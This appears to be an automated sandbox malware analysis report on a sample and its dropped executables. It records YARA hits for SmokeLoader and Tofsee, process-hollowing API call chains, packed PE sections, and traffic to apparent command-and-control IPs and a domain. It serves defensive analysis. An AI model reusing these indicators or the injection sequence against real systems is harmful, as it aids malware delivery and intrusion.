                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 13:00:05 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 13:00:10 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 13:00:10 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 13:00:13 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 13:00:13 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 13:00:14 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 13:00:14 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 13:00:16 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 13:00:17 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.186.142.166
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: svchost.exe, 0000001D.00000003.442194448.000001A704385000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.442084941.000001A70437D000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.441081784.000001A70439F000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE"
,"RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-01-07T11:33:20.1626869Z||.||d5cdcec3-04df-404e-ba07-3240047c89f9||1152921505694348672||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                      Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://doekvpclh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 268Host: host-data-coin-11.com
                      Source: unknownHTTPS traffic detected: 185.233.81.115:443 -> 192.168.2.3:49790 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49811 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.139.105:443 -> 192.168.2.3:49874 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49876 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49891 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49918 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49924 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49933 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      Yara detected SmokeLoader
                      Source: Yara matchFile source: 17.0.iscgwer.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.0.iscgwer.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.0.53DC.exe.400000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.0.53DC.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.0.iscgwer.400000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.0.53DC.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.9ro85QVN0F.exe.6315a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.53DC.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.53DC.exe.6315a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.1.9ro85QVN0F.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.1.iscgwer.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.1.53DC.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.9ro85QVN0F.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.iscgwer.5615a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.iscgwer.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000002.340237120.0000000000530000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000000.326990095.0000000004DE1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.420944310.0000000001F51000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.420623827.0000000000430000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.340386924.00000000022F1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.395898272.00000000004D1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.395779805.0000000000460000.00000004.00000001.sdmp, type: MEMORY
                      Source: 9ro85QVN0F.exe, 00000000.00000002.283207152.00000000008DA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      Spam, unwanted Advertisements and Ransom Demands:

                      Yara detected Tofsee
                      Source: Yara matchFile source: 25.3.F4CF.exe.780000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.F4CF.exe.650e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.F4CF.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.F4CF.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000019.00000002.458534378.0000000000650000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.413183404.0000000000780000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000002.458185502.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: F4CF.exe PID: 6380, type: MEMORYSTR

                      System Summary:

                      PE file has nameless sections
                      Source: 27E3.exe.11.drStatic PE information: section name:
                      Source: 27E3.exe.11.drStatic PE information: section name:
                      Source: 27E3.exe.11.drStatic PE information: section name:
                      Source: 27E3.exe.11.drStatic PE information: section name:
                      Source: 27E3.exe.11.drStatic PE information: section name:
                      Source: 27E3.exe.11.drStatic PE information: section name:
                      Source: 7480.exe.11.drStatic PE information: section name:
                      Source: 7480.exe.11.drStatic PE information: section name:
                      Source: 7480.exe.11.drStatic PE information: section name:
                      Source: 7480.exe.11.drStatic PE information: section name:
                      Source: 7480.exe.11.drStatic PE information: section name:
                      Source: 7480.exe.11.drStatic PE information: section name:
                      Source: C:\Users\user\AppData\Local\Temp\411E.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4256 -s 520
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 0_2_0042A440
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 0_2_0042B220
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 0_2_00424F10
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 0_2_006331FF
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 0_2_00633253
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 1_2_00402A5F
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 1_2_00402AB3
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 1_1_00402A5F
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 1_1_00402AB3
                      Source: C:\Users\user\AppData\Roaming\iscgwerCode function: 16_2_00563253
                      Source: C:\Users\user\AppData\Roaming\iscgwerCode function: 16_2_005631FF
                      Source: C:\Users\user\AppData\Roaming\iscgwerCode function: 17_2_00402A5F
                      Source: C:\Users\user\AppData\Roaming\iscgwerCode function: 17_2_00402AB3
                      Source: C:\Users\user\AppData\Local\Temp\411E.exeCode function: 19_2_004027CA
                      Source: C:\Users\user\AppData\Local\Temp\411E.exeCode function: 19_2_00401FF1
                      Source: C:\Users\user\AppData\Local\Temp\411E.exeCode function: 19_2_0040158E
                      Source: C:\Users\user\AppData\Local\Temp\411E.exeCode function: 19_2_004015A6
                      Source: C:\Users\user\AppData\Local\Temp\411E.exeCode function: 19_2_004015BC
                      Source: C:\Users\user\AppData\Local\Temp\411E.exeCode function: 19_2_00411065
                      Source: C:\Users\user\AppData\Local\Temp\411E.exeCode function: 19_2_00412A02
                      Source: C:\Users\user\AppData\Local\Temp\411E.exeCode function: 19_2_0040CAC5
                      Source: C:\Users\user\AppData\Local\Temp\411E.exeCode function: 19_2_00410B21
                      Source: C:\Users\user\AppData\Local\Temp\411E.exeCode function: 19_2_004115A9
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeCode function: 20_2_00633253
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeCode function: 20_2_006331FF
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeCode function: 22_2_00402A5F
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeCode function: 22_2_00402AB3
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeCode function: 22_1_00402A5F
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeCode function: 22_1_00402B2E
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_00410800
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_00411280
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_004103F0
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_004109F0
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_00670640
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_00670C40
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_00670A50
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_006714D0
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exeCode function: 25_2_0040C913
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exeCode function: 25_2_0042B010
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exeCode function: 25_2_0042A230
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exeCode function: 25_2_00424D00
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeCode function: 26_2_013D96F0
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeCode function: 26_2_013D0470
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeCode function: 26_2_013D0462
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeCode function: 26_2_02FEA430
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeCode function: 26_2_02FEAD57
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeCode function: 26_2_02FE53F0
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeCode function: 26_2_02FE90D3
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeCode function: 26_2_02FE08B0
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeCode function: 26_2_02FE2CB8
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeCode function: 26_2_02FE1528
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exeCode function: 25_2_00401280 ShellExecuteExW,lstrlenW,GetStartupInfoW,CreateProcessWithLogonW,WaitForSingleObject,CloseHandle,CloseHandle,GetLastError,GetLastError,
                      Source: 9ro85QVN0F.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 9ro85QVN0F.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 9ro85QVN0F.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 9ro85QVN0F.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: FE11.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: FE11.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: FE11.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: D54.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: D54.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: D54.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: D54.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 433C.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 433C.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 433C.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 53A8.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 411E.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 411E.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 411E.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 53DC.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 53DC.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 53DC.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 53DC.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: E6C4.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: E6C4.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: E6C4.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: E6C4.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: F4CF.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: F4CF.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: F4CF.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: F4CF.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: iscgwer.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: iscgwer.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: iscgwer.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: iscgwer.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: bzxmernq.exe.25.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: bzxmernq.exe.25.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: bzxmernq.exe.25.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: bzxmernq.exe.25.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dll
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeSection loaded: mscorjit.dll
                      Source: 9ro85QVN0F.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\jdijwvkg\
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: String function: 004048D0 appears 460 times
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: String function: 00422C80 appears 133 times
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: String function: 0041E400 appears 172 times
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exeCode function: String function: 0041E1D0 appears 32 times
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exeCode function: String function: 0040EE2A appears 40 times
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exeCode function: String function: 00402544 appears 53 times
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 0_2_00630110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 1_2_00401962 Sleep,NtTerminateProcess,
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 1_2_0040196D Sleep,NtTerminateProcess,
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 1_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 1_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 1_2_00401A0B NtTerminateProcess,
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 1_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 1_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 1_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 1_2_00402084 LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 1_2_00402491 NtOpenKey,
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 1_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 1_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 1_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 1_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 1_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 1_1_00402084 LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 1_1_00402491 NtOpenKey,
                      Source: C:\Users\user\AppData\Roaming\iscgwerCode function: 16_2_00560110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                      Source: C:\Users\user\AppData\Roaming\iscgwerCode function: 17_2_00401962 Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Roaming\iscgwerCode function: 17_2_0040196D Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Roaming\iscgwerCode function: 17_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\iscgwerCode function: 17_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                      Source: C:\Users\user\AppData\Roaming\iscgwerCode function: 17_2_00401A0B NtTerminateProcess,
                      Source: C:\Users\user\AppData\Roaming\iscgwerCode function: 17_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\iscgwerCode function: 17_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\iscgwerCode function: 17_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\iscgwerCode function: 17_2_00402084 LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\iscgwerCode function: 17_2_00402491 NtOpenKey,
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeCode function: 20_2_00630110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeCode function: 22_2_00401962 Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeCode function: 22_2_0040196D Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeCode function: 22_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeCode function: 22_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeCode function: 22_2_00401A0B NtTerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeCode function: 22_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeCode function: 22_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeCode function: 22_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeCode function: 22_2_00402084 LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeCode function: 22_2_00402491 NtOpenKey,
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeCode function: 22_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeCode function: 22_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeCode function: 22_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeCode function: 22_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeCode function: 22_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeCode function: 22_1_00402084 LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeCode function: 22_1_00402491 NtOpenKey,
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exeCode function: 25_2_00401820 GetCurrentProcess,NtQueryInformationToken,
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeCode function: 26_2_056FF5C0 NtUnmapViewOfSection,
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeCode function: 26_2_056FF6A0 NtAllocateVirtualMemory,
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exeCode function: 25_2_00408E26: CreateFileW,DeviceIoControl,CloseHandle,
                      Source: FE11.exe.11.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: 433C.exe.11.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: 411E.exe.11.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: 27E3.exe.11.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                      Source: 7480.exe.11.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                      Source: 14F6.exe.11.drStatic PE information: Section: .rsrc ZLIB complexity 0.997729445507
                      Source: 27E3.exe.11.drStatic PE information: Section: ZLIB complexity 1.00044194799
                      Source: 27E3.exe.11.drStatic PE information: Section: ZLIB complexity 1.00537109375
                      Source: 27E3.exe.11.drStatic PE information: Section: ZLIB complexity 1.00051229508
                      Source: 27E3.exe.11.drStatic PE information: Section: ZLIB complexity 1.0107421875
                      Source: 53A8.exe.11.drStatic PE information: Section: .didata ZLIB complexity 0.999523355577
